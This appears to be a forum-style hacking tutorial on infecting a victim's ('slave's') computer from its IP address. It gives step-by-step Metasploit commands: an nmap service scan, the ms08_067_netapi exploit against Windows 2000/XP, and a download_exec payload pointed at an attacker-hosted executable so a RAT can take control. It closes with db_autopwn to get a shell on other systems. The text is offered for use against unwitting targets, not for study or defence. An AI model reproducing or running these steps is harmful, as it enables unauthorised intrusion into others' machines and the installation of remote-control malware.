“Is it possible to infect slave using his IP address?”
So, I am going to show you how to do it.
First of all you need target ip of your slave.
Then open Metasploit Console & type db_create.
[Use: This’ll create or connect you to database.]
Once you do that type Nmap.
[Use: This’ll load Nmap in Metasploit Console]
Next you need to type db_nmap -sT -sV <target ip>
[This’ll scan OS, Ports, and Services running on slave’s computer.]
Wait for 5 min’s to complete its scan.
Once done, Note down the OS, Ports, and Services running on slave’s computer.
Now it’s time to exploit slave’s machine.
Exploit depends on the OS, Ports, and Services running on slave’s computer.
So, you’re lucky if you get OS WIN XP or 2000 because it’s easy to exploit them.
No matter weather they’re protected by any firewall or not.
Now I’ll tell you exploiting:-
Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)
Type show exploits
[Use: This’ll show all the exploits in its database.]
Next you need to type use windows/smb/ms08_067_netapi
[Use: This’ll select the exploit windows/smb/ms08_067_netapi]
Now Type show targets
[Use: This’ll show all targets by exploit]
Now Type set target 0
[Use: This’ll set target to 0 specified]
Then type show payloads
[Use: This’ll bring up all the payloads]
Next type set payload windows/download_exec
[Use: This’ll set payload as windows/download_exec]
Then Type show options
[Use: This’ll show all options in the exploit & payload]
In window you’ll see many options, in which you need to
Fill only two options RHOST & URL.
Type set RHOST <xxx.xxx.xxx.xxx >
[Use: This’ll set RHOST (slave’s ip) to xxx.xxx.xxx.xxx]
Next Type set URL http://www.xxxx.com/xxx.exe
[Use: This’ll set URL to your direct server link.]
At last you need to type exploit
[Use: This will launch your exploit & your slave will be infected.]
You can now control you’re slave with RAT.
So, any versions of Win 2000-XP can be exploited easily.
In case if you didn’t get this two OS’, immediately after Nmap scan
You can use the command db_autopwn –p –t –e.
In most cases you get a shell.